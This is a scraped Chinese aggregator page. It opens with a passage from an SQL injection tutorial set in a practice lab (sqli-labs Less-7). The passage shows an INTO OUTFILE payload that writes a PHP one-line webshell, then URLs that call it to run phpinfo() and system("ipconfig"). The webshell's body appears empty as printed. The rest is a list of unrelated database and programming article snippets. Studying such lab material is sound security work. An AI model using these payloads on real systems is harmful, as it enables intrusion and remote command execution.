SQL注入(一)-基础_第97张图片

2、文件上传(一句话木马)案例

1、先判断注入点 | 判断列数 | 判断注入方法这里我们的方法就是使用into outfile文件写入函数
2、构造文件写入一句话木马payload

http://192.168.2.101/sqli/Less-7?id=1')) union select 1,2,"" into outfile "C:\\phpstudy_pro\\www\\ben.php"--+

3、访问我们上传的木马文件

http://192.168.2.101/ben.php?pass=phpinfo();

SQL注入(一)-基础_第98张图片

除了使用phpinfo()函数,我们还可以使用system()来控制目标机器
例如:查看ip地址

http://192.168.2.101/ben.php?pass=system("ipconfig");

SQL注入(一)-基础_第99张图片

POST注入

一、POST请求方法之union注入

二、POST请求方法之报错注入

三、POST请求方法之盲注

四、POST dnslog注入

你可能感兴趣的:(sql,web安全)

  • mysql查询 limit 1000,10 和limit 10 一样快么,如何优化? 佳德_Boy mysql数据库java
    目录问题两种limit的执行过程基于主键索引的limit执行过程基于非主键索引的limit执行过程深度分页问题总结(最终解决方案)问题第一页就是下面这样的sql语句。select*frompageorderbyidlimit0,10;第一百页就是select*frompageorderbyidlimit990,10;用这种方式,同样都是拿10条数据,查第一页和第一百页的查询速度是一样的吗?为什么?
  • 面试完整回答:SQL 分页查询中 limit 500000,10和 limit 10 速度一样快吗? 程序员琛琛 数据库笔记java面试面试sqloracle
    首先:在SQL分页查询中,LIMIT500000,10和LIMIT10的速度不会一样快,以下是原因和优化建议:性能差异的原因LIMIT10:只需要扫描前10条记录,然后返回结果。性能非常高,因为数据库只需读取少量数据。LIMIT500000,10:需要先扫描前500000条记录,然后跳过它们,再返回接下来的10条记录。性能较低,因为数据库需要读取并跳过大量数据。数据库的执行过程对于LIMIToff
  • 19.4.9 数据库方式操作Excel .Net学习 C#教程excel数据库c#
    版权声明:本文为博主原创文章,转载请在显著位置标明本文出处以及作者网名,未经作者允许不得用于商业目的。本节所说的操作Excel操作是讲如何把Excel作为数据库来操作。通过COM来操作Excel操作,请参看第21.2节在第19.3.4节【连接Excel】中已经讲述了如何连接Excel。剩下的操作就和前面几节操作Access数据库一样。注意:Excel不支持删除一行记录,使用SQL的delete语句
  • 【mysql】锁机制 - 2.行锁间隙锁临键锁 m0_54804970 面试学习路线阿里巴巴mysql数据库
    目录1.锁的几种类型1.1记录锁(行锁)?RecordLock1.2?间隙锁GapLock1.3临键锁?Next-KeyLock2.加锁过程2.1唯一索引的查询(1)等值查询,查询记录存在(2)?等值查询,查询记录不存在(3)范围查询2.2普通索引的查询(1)等值查询,查询记录存在(2)等值查询,查询记录不存在(3)范围查询2.3其他查询2.4总结1.锁的几种类型对InnoDB按照锁粒度可以分为:
  • Flink SQL 优化实战 - 维表 JOIN 优化 腾讯云大数据 大数据数据库flinksql
    作者:龙逸尘,腾讯CSIG高级工程师背景介绍维表(DimensionTable)是来自数仓建模的概念。在数仓模型中,事实表(FactTable)是指存储有事实记录的表,如系统日志、销售记录等,而维表是与事实表相对应的一种表,它保存了事实表中指定属性的相关详细信息,可以跟事实表做关联;相当于将事实表上经常重复出现的属性抽取、规范出来用一张表进行管理。在实际生产中,我们经常会有这样的需求,以原始数据流
  • Django ORM - 聚合查询 lsx202406 开发语言
    DjangoORM-聚合查询引言Django是一个强大的PythonWeb框架,它拥有一个功能丰富的对象关系映射(Object-RelationalMapping,简称ORM)。ORM允许开发者以Python类和对象的交互方式来操作数据库,而不是直接编写SQL查询。本文将深入探讨DjangoORM中的聚合查询功能,包括其基本用法、常用函数以及在实际开发中的应用场景。聚合查询简介聚合查询,顾名思义,
  • 使用 Canal 实时从 MySql 向其它库同步数据 m0_74823239 面试学习路线阿里巴巴mysql数据库
    目前绝大多数项目还是采用mysql作为数据存储,对于用户访问量较高的网站来说,mysql读写性能有限,我们通常会把mysql中的数据实时同步到Redis、mongodb、elasticsearch等中间件中,应对高并发访问场景,减轻mysql压力,防止数据库宕机。在项目开发中,为了不会原有代码进行侵入,采用canal中间件实现mysql向其它库的实时同步,是一种很不错的方案。canal译意为水道/
  • C# ASP.NET的应用场景 来恩1003 C#从入门到精通c#asp.net数据库
    .NET学习资料.NET学习资料.NET学习资料C#ASP.NET作为一种强大的Web开发框架,在众多领域都有着广泛的应用,为各类Web应用的开发提供了高效、可靠的解决方案。以下是其主要的应用场景:企业级Web应用在企业级应用开发中,C#ASP.NET凭借其卓越的性能和强大的功能,成为众多企业的首选。它能够与企业现有的系统和数据库进行无缝集成,例如与MicrosoftSQLServer数据库紧密结
  • 【MySQL】mysqldump使用方法 m0_74825152 面试学习路线阿里巴巴mysqloracle数据库
    本文介绍MySQL数据库mysqldump常用方法。MySQL数据库mysqldump常用方法导出整个数据库(包括数据库中的数据)。mysqldump-uusername-pdbname>dbname.sql导出数据库结构(不含数据)。mysqldump-uusername-p-ddbname>dbname.sql导出数据库中的某张数据表(包含数据)。mysqldump-uusername-pdb
  • 【MySQL】在 Centos7 环境安装 MySQL -- 详细完整教程 m0_74823842 面试学习路线阿里巴巴mysqlwebviewandroid
    说明:安装与卸载中,用户全部切换成为root,一旦安装,普通用户就能使用。一、卸载内置环境1、卸载不要的环境[root@VM-8-5-centos~]$psajx|grepmariadb#先检查是否有mariadb存在13134148441484313134pts/014843S+10050:00grep--color=automariadb19010191871901019010?-1Sl271
  • Amazon RDS Performance Insights优化SQL性能 ivwdcwso 运维开发sql数据库awsPerformancerds
    1.关键SQL性能指标分析1.1执行时间总执行时间:衡量SQL语句消耗的总时间。平均执行时间:单次执行的平均耗时。最大执行时间:最长的单次执行时间,用于识别异常情况。1.2执行频率调用次数:SQL语句被执行的总次数。每秒执行次数:反映SQL的执行频率。1.3资源消耗CPU使用率:SQL执行消耗的CPU资源。I/O使用:包括读取和写入的I/O操作数。内存使用:SQL执行过程中的内存消耗。1.4等待事
  • 阿里云RDS到亚马逊云RDS的实时数据同步方案详解 ivwdcwso 运维阿里云云计算awskda数据同步
    1.需求背景在当今的多云环境中,企业经常需要在不同云平台之间同步数据。本文将详细介绍如何实现从阿里云RDSMySQL数据库到亚马逊云RDSMySQL数据库的实时数据同步。这种同步对于数据备份、跨区域数据访问、数据分析等场景都非常有用。2.方案概述我们将使用AWSKinesisDataAnalytics(KDA)作为核心组件来实现这个实时同步方案。KDA基于ApacheFlink,支持使用SQL或J
  • 实战探析:云数据库 RDS SQL Server 版的优点与应用案例 步入烟尘 python数据库oracle性能优化
    实战探析:云数据库RDSSQLServer版的优点与应用案例背景:随着云计算技术的不断发展,越来越多的企业开始将数据库迁移到云端,以降低成本、提高可用性和灵活性。而在云数据库的选择上,AmazonRDS(RelationalDatabaseService)SQLServer版本成为了众多企业的首选之一。本文将深入探讨在实际应用中,利用云数据库RDSSQLServer版所带来的优点及其实战应用。云数
  • MongoDB入门与实践 风中凌乱的猿 笔记mongodb数据库
    MongoDB是一个NoSQL数据库,它采用文档模型来存储数据,具有高性能、易扩展、灵活的特点。以下是MongoDB的入门指南和一些基本的实践示例,帮助你开始使用MongoDB。1.安装和基本配置安装MongoDB具体安装方法取决于你的操作系统。以Ubuntu为例,可以通过以下命令安装MongoDB:sudoaptupdatesudoaptinstall-ymongodb启动MongoDB安装完成
  • 大数据之-hdfs+hive+hbase+kudu+presto集群(6节点) 管哥的运维私房菜 大数据hdfshivekuduprestohbase
    几个主要软件的下载地址:prestohttps://prestosql.io/docs/current/index.htmlkudurpm包地址https://github.com/MartinWeindel/kudu-rpm/releaseshivehttp://mirror.bit.edu.cn/apache/hive/hdfshttp://archive.apache.org/dist/ha
  • MySQL修改max_allowed_packet 一张假钞 mysql
    个人博客地址:MySQL修改max_allowed_packet|一张假钞的真实世界通过global参数设置:setglobalmax_allowed_packet=32*1024*1024;注意,下面的写法是不正确的:setglobalmax_allowed_packet=32m;如果要重启也生效的话,在my.cnf中添加如下配置:max_allowed_packet=32m
  • doris:查询缓存 向阳1218 大数据doris
    概念介绍SQLCache是Doris提供的一种查询优化机制,可以显著提升查询性能。它通过缓存查询结果来减少重复计算,适用于数据更新频率较低的场景。SQLCache基于以下关键因素来存储和获取缓存:SQL文本视图定义表和分区的版本用户变量和结果值非确定函数和结果值行策略定义数据脱敏定义以上因素的组合唯一确定一个缓存数据集。如果其中任何一个发生变化,例如SQL变化、查询字段或条件不同或者数据更新后版本
  • python创建sqlite3数据库_SQLite – Python | 菜鸟教程 weixin_39683144
    SQLite-Python安装SQLite3可使用sqlite3模块与Python进行集成。sqlite3模块是由GerhardHaring编写的。它提供了一个与PEP249描述的DB-API2.0规范兼容的SQL接口。您不需要单独安装该模块,因为Python2.5.x以上版本默认自带了该模块。为了使用sqlite3模块,您首先必须创建一个表示数据库的连接对象,然后您可以有选择地创建光标对象,这将
  • 宋红康 MySQL高级篇 学习笔记 偷偷儿 mysql学习笔记
    架构篇1.sql的执行流程查询缓存:有就直接返回了。解析器进行解析:检查sql合不合语法优化器:对sql语句进行逻辑优化,看是否使用索引,生成执行计划。存贮引擎:myisam,innodb去执行上述计划当然返回的时候也会在缓存一下结果。索引及调优篇1.InnoDBB+树索引的注意事项(页分裂的场景)1.根页面万年不动(页分裂):创建后,用户数据用完可用空间,就会新产生一个页a,并将根节点的数据复制
  • linux下使用mysql(上) It塔塔开 linuxmysql运维
    1、安装mysqlaptsearchmysql-server...#查询结果mysql-server-8.0/focal-security,focal-updates8.0.41-0ubuntu0.20.04.1amd64MySQLdatabaseserverbinariesandsystemdatabasesetup...aptinstallmysql-server-8.0...2、连接数据库m
  • 【MySQL】 常见数据类型 web13688565871 面试学习路线阿里巴巴mysql数据库
    MySQL常见数据类型1.整数类型2.浮点数类型3.定点数类型4.bit类型5.字符串类型5.1char和varchar类型5.2日期类型和时间类型5.3enum和set类型1.整数类型整数类型默认都是有符号整数类型名称字节数类型说明tinyint1带符号的范围-128127,无符号范围0255smallint2带符号的范围-2^15~2^15-1,无符号2^16-1mediumint3带符号的范
  • 利用VBA+SQL查询Excel工作表数据(模糊查询) VBAMatrix VBA代码sqlexcel数据库
    续前2篇:1.利用VBA+SQL查询Excel工作表数据(基本查询)2.利用VBA+SQL查询Excel工作表数据(条件查询)本文将继续使用VBA+SQL查询的模板,并详细介绍SQL模糊查询语句在VBA中的使用。VBA+SQL查询的模板题[员工花名册$A1:I65536]SQL模糊查询的关键词是like、notlike,通常结合通配符使用,从而实现模糊查询的功能。通配符见下表:通配符含义%匹配一个
  • mybatis-plus逆向code generator pgsql实践 松树戈 工具使用mybatisspringboot
    mybatis-plus逆向codegeneratorpgsql实践环境准备重要工具的版本供参考pom依赖待逆向的SQL配置文件CodeGenerator配置类配置类说明环境准备重要工具的版本jdk1.8.0_131springboot2.7.6mybatis-plus3.5.7pgsql14.15供参考pom依赖4.0.0com.tghparent-demo0.0.1-SNAPSHOTparen
  • docker 安装mysql hunter199010 docker容器运维
    1、下载镜像我这里下载的是mysql5.7.82、创建MySQL专用目录mkdir/data/mysql1cd/data/mysql1mkdirconfmkdirdatamkdirlog下面这个是我的启动命令sudodockerrun-d-p3306:3306--restart=always-v/data/mysql1/log:/var/log/mysql-v/data/mysql1/data:/
  • 使用 MySQL 从 JSON 字符串提取数据 m0_66323401 面试学习路线阿里巴巴mysqljsonoracle
    使用MySQL从JSON字符串提取数据在现代数据库管理中,JSON格式因其灵活性而广泛使用。然而,当数据存储在JSON中时,我们经常需要将其转换为更易于处理的格式。本篇文章将通过一个具体的SQL查询示例,展示如何从存储在MySQL中的JSON字符串提取数据并重新格式化。1.背景知识JSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式,易于阅读和编写,同时也易于机器
  • 中国第一本介绍企业级开发工具Zend的书籍 weixin_34245749 开发工具数据库javascriptViewUI
    【书名】大道PHP:LAMP+Zend+开源框架整合开发与实战【作者】三扬科技【ISBN】978-7-121-09171-1【出版社】电子工业出版社【出版日期】2009年9月【定价】99.00元(含视频DVD1张)【宣传语】第一本介绍企业级开发工具Zend的书籍最完整的PHP5开发技术与实战代码万用大全基于Linux+Apache+MySQL+PHP黄金组合,Socket、WebService、A
  • MyBatis 源码解析:动态 SQL 生成的基本原理 捕风捉你 MyBatis源码解读mybatistomcat
    摘要MyBatis提供了灵活的动态SQL功能,使得开发者可以根据业务需求在运行时生成不同的SQL语句。动态SQL是MyBatis最具特色的功能之一,它允许我们通过条件拼接来生成复杂的查询语句。本文将通过自定义实现一个简化的动态SQL生成器,解析其工作原理,并结合MyBatis的源码进行深入讲解。前言传统的SQL查询往往需要开发者根据不同的业务逻辑手动拼接SQL语句,而这种方式不仅容易出错,也不够灵
  • MySQL中update语法的使用(超详细) AI_茗 mysql数据库
    在MySQL中,UPDATE语句用于修改已存在的表中的记录。以下是对UPDATE语句的详细解释和使用方法:语法UPDATEtable_nameSETcolumn1=value1,column2=value2,...WHEREcondition;table_name:要更新的表名。SET:用于指定要更新的列和新的值。column1,column2,...:要更新的列名。value1,value2,.
  • 算法练习|Leetcode49字母异位词分词 ,Leetcode128最长连续序列,Leetcode3无重复字符的最长子串,sql总结 ambitious_Rgr 算法sql哈希哈希算法数据结构leetcodepython
    目录一、Leetcode49字母异位词分词题目描述解题思路方法:哈希总结二、Leetcode128最长连续序列题目描述解题思路方法:总结三、Leetcode3无重复字符的最长子串题目描述解题思路方法:双指针法总结sql总结一、Leetcode49字母异位词分词题目描述给你一个字符串数组,请你将字母异位词组合在一起。可以按任意顺序返回结果列表。字母异位词是由重新排列源单词的所有字母得到的一个新单词。
  • Python图形界面 Tkinter入门6 数据库sqlite3 mango大侠 Pythonpython数据库sqlite3tkinter
    6.1数据库sqlite3基础fromtkinterimport*importsqlite3importosroot=Tk()root.title('数据库sqlite3操作')root.geometry('400x400')#sqlite3-------------------------------------------------##检查数据库文件是否存在,不存在就创建,user表:ifn
  • ASM系列六 利用TreeApi 添加和移除类成员 lijingyao8206 jvm动态代理ASM字节码技术TreeAPI
        同生成的做法一样,添加和移除类成员只要去修改fields和methods中的元素即可。这里我们拿一个简单的类做例子,下面这个Task类,我们来移除isNeedRemove方法,并且添加一个int 类型的addedField属性。   package asm.core; /** * Created by yunshen.ljy on 2015/6/
  • Springmvc-权限设计 bee1314 springWebjsp
    万丈高楼平地起。 权限管理对于管理系统而言已经是标配中的标配了吧,对于我等俗人更是不能免俗。同时就目前的项目状况而言,我们还不需要那么高大上的开源的解决方案,如Spring Security,Shiro。小伙伴一致决定我们还是从基本的功能迭代起来吧。 目标: 1.实现权限的管理(CRUD) 2.实现部门管理 (CRUD) 3.实现人员的管理 (CRUD) 4.实现部门和权限
  • 算法竞赛入门经典(第二版)第2章习题 CrazyMizzz c算法
    2.4.1 输出技巧 #include <stdio.h> int main() { int i, n; scanf("%d", &n); for (i = 1; i <= n; i++) printf("%d\n", i); return 0; } 习题2-2 水仙花数(daffodil
  • struts2中jsp自动跳转到Action 麦田的设计者 jspwebxmlstruts2自动跳转
    1、在struts2的开发中,经常需要用户点击网页后就直接跳转到一个Action,执行Action里面的方法,利用mvc分层思想执行相应操作在界面上得到动态数据。毕竟用户不可能在地址栏里输入一个Action(不是专业人士)   2、<jsp:forward page="xxx.action" /> ,这个标签可以实现跳转,page的路径是相对地址,不同与jsp和j
  • php 操作webservice实例 IT独行者 PHPwebservice
    首先大家要简单了解了何谓webservice,接下来就做两个非常简单的例子,webservice还是逃不开server端与client端。我测试的环境为:apache2.2.11 php5.2.10做这个测试之前,要确认你的php配置文件中已经将soap扩展打开,即extension=php_soap.dll; OK 现在我们来体验webservice //server端 serve
  • Windows下使用Vagrant安装linux系统 _wy_ windowsvagrant
    准备工作: 下载安装 VirtualBox :https://www.virtualbox.org/ 下载安装 Vagrant :http://www.vagrantup.com/ 下载需要使用的 box : 官方提供的范例:http://files.vagrantup.com/precise32.box 还可以在 http://www.vagrantbox.es/ 
  • 更改linux的文件拥有者及用户组(chown和chgrp) 无量 clinuxchgrpchown
    本文(转) http://blog.163.com/yanenshun@126/blog/static/128388169201203011157308/ http://ydlmlh.iteye.com/blog/1435157 一、基本使用: 使用chown命令可以修改文件或目录所属的用户:        命令
  • linux下抓包工具 矮蛋蛋 linux
    原文地址: http://blog.chinaunix.net/uid-23670869-id-2610683.html tcpdump -nn -vv -X udp port 8888 上面命令是抓取udp包、端口为8888 netstat -tln 命令是用来查看linux的端口使用情况 13 . 列出所有的网络连接 lsof -i 14. 列出所有tcp 网络连接信息 l
  • 我觉得mybatis是垃圾!:“每一个用mybatis的男纸,你伤不起” alafqq mybatis
    最近看了  每一个用mybatis的男纸,你伤不起 原文地址 :http://www.iteye.com/topic/1073938 发表一下个人看法。欢迎大神拍砖; 个人一直使用的是Ibatis框架,公司对其进行过小小的改良; 最近换了公司,要使用新的框架。听说mybatis不错;就对其进行了部分的研究; 发现多了一个mapper层;个人感觉就是个dao;
  • 解决java数据交换之谜 百合不是茶 数据交换
    交换两个数字的方法有以下三种 ,其中第一种最常用   /* 输出最小的一个数 */ public class jiaohuan1 { public static void main(String[] args) { int a =4; int b = 3; if(a<b){ // 第一种交换方式 int tmep =
  • 渐变显示 bijian1013 JavaScript
    <style type="text/css"> #wxf { FILTER: progid:DXImageTransform.Microsoft.Gradient(GradientType=0, StartColorStr=#ffffff, EndColorStr=#97FF98); height: 25px; } </style>
  • 探索JUnit4扩展:断言语法assertThat bijian1013 java单元测试assertThat
    一.概述         JUnit 设计的目的就是有效地抓住编程人员写代码的意图,然后快速检查他们的代码是否与他们的意图相匹配。 JUnit 发展至今,版本不停的翻新,但是所有版本都一致致力于解决一个问题,那就是如何发现编程人员的代码意图,并且如何使得编程人员更加容易地表达他们的代码意图。JUnit 4.4 也是为了如何能够
  • 【Gson三】Gson解析{"data":{"IM":["MSN","QQ","Gtalk"]}} bit1129 gson
      如何把如下简单的JSON字符串反序列化为Java的POJO对象? {"data":{"IM":["MSN","QQ","Gtalk"]}}   下面的POJO类Model无法完成正确的解析:   import com.google.gson.Gson;
  • 【Kafka九】Kafka High Level API vs. Low Level API bit1129 kafka
    1. Kafka提供了两种Consumer API High Level Consumer API Low Level Consumer API(Kafka诡异的称之为Simple Consumer API,实际上非常复杂) 在选用哪种Consumer API时,首先要弄清楚这两种API的工作原理,能做什么不能做什么,能做的话怎么做的以及用的时候,有哪些可能的问题  
  • 在nginx中集成lua脚本:添加自定义Http头,封IP等 ronin47 nginx lua
    Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。 强制搜索引擎只索引mixlr.com Google把子域名当作完全独立的网站,我们不希望爬虫抓取子域名的页面,降低我们的Page rank。 location /{
  • java-归并排序 bylijinnan java
    import java.util.Arrays; public class MergeSort { public static void main(String[] args) { int[] a={20,1,3,8,5,9,4,25}; mergeSort(a,0,a.length-1); System.out.println(Arrays.to
  • Netty源码学习-CompositeChannelBuffer bylijinnan javanetty
    CompositeChannelBuffer体现了Netty的“Transparent Zero Copy” 查看API( http://docs.jboss.org/netty/3.2/api/org/jboss/netty/buffer/package-summary.html#package_description) 可以看到,所谓“Transparent Zero Copy”是通
  • Android中给Activity添加返回键 hotsunshine Activity
    // this need android:minSdkVersion="11" getActionBar().setDisplayHomeAsUpEnabled(true); @Override public boolean onOptionsItemSelected(MenuItem item) {
  • 静态页面传参 ctrain 静态
    $(document).ready(function () { var request = { QueryString : function (val) { var uri = window.location.search; var re = new RegExp("" + val + "=([^&?]*)", &
  • Windows中查找某个目录下的所有文件中包含某个字符串的命令 daizj windows查找某个目录下的所有文件包含某个字符串
    findstr可以完成这个工作。   [html]  view plain copy   >findstr /s /i "string" *.*   上面的命令表示,当前目录以及当前目录的所有子目录下的所有文件中查找"string&qu
  • 改善程序代码质量的一些技巧 dcj3sjt126com 编程PHP重构
    有很多理由都能说明为什么我们应该写出清晰、可读性好的程序。最重要的一点,程序你只写一次,但以后会无数次的阅读。当你第二天回头来看你的代码 时,你就要开始阅读它了。当你把代码拿给其他人看时,他必须阅读你的代码。因此,在编写时多花一点时间,你会在阅读它时节省大量的时间。让我们看一些基本的编程技巧:    尽量保持方法简短    尽管很多人都遵
  • SharedPreferences对数据的存储 dcj3sjt126com
    SharedPreferences简介:                                                   &nbs
  • linux复习笔记之bash shell (2) bash基础 eksliang bashbash shell
    转载请出自出处: http://eksliang.iteye.com/blog/2104329 1.影响显示结果的语系变量(locale)  1.1locale这个命令就是查看当前系统支持多少种语系,命令使用如下: [root@localhost shell]# locale LANG=en_US.UTF-8 LC_CTYPE="en_US.UTF-8"
  • Android零碎知识总结 gqdy365 android
    1、CopyOnWriteArrayList add(E) 和remove(int index)都是对新的数组进行修改和新增。所以在多线程操作时不会出现java.util.ConcurrentModificationException错误。 所以最后得出结论:CopyOnWriteArrayList适合使用在读操作远远大于写操作的场景里,比如缓存。发生修改时候做copy,新老版本分离,保证读的高
  • HoverTree.Model.ArticleSelect类的作用 hvt Web.netC#hovertreeasp.net
    ArticleSelect类在命名空间HoverTree.Model中可以认为是文章查询条件类,用于存放查询文章时的条件,例如HvtId就是文章的id。HvtIsShow就是文章的显示属性,当为-1是,该条件不产生作用,当为0时,查询不公开显示的文章,当为1时查询公开显示的文章。HvtIsHome则为是否在首页显示。HoverTree系统源码完全开放,开发环境为Visual Studio 2013
  • PHP 判断是否使用代理 PHP Proxy Detector 天梯梦 proxy
    1. php 类 I found this class looking for something else actually but I remembered I needed some while ago something similar and I never found one. I'm sure it will help a lot of developers who try to
  • apache的math库中的回归——regression(翻译) lvdccyb Mathapache
    这个Math库,虽然不向weka那样专业的ML库,但是用户友好,易用。 多元线性回归,协方差和相关性(皮尔逊和斯皮尔曼),分布测试(假设检验,t,卡方,G),统计。   数学库中还包含,Cholesky,LU,SVD,QR,特征根分解,真不错。   基本覆盖了:线代,统计,矩阵, 最优化理论 曲线拟合 常微分方程 遗传算法(GA), 还有3维的运算。。。
  • 基础数据结构和算法十三:Undirected Graphs (2) sunwinner Algorithm
      Design pattern for graph processing. Since we consider a large number of graph-processing algorithms, our initial design goal is to decouple our implementations from the graph representation
  • 云计算平台最重要的五项技术 sumapp 云计算云平台智城云
    云计算平台最重要的五项技术 1、云服务器 云服务器提供简单高效,处理能力可弹性伸缩的计算服务,支持国内领先的云计算技术和大规模分布存储技术,使您的系统更稳定、数据更安全、传输更快速、部署更灵活。 特性 机型丰富 通过高性能服务器虚拟化为云服务器,提供丰富配置类型虚拟机,极大简化数据存储、数据库搭建、web服务器搭建等工作; 仅需要几分钟,根据CP
  • 《京东技术解密》有奖试读获奖名单公布 ITeye管理员 活动
    ITeye携手博文视点举办的12月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。  12月试读活动回顾: http://webmaster.iteye.com/blog/2164754 本次技术图书试读活动获奖名单及相应作品如下: 一等奖(两名) Microhardest:http://microhardest.ite
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他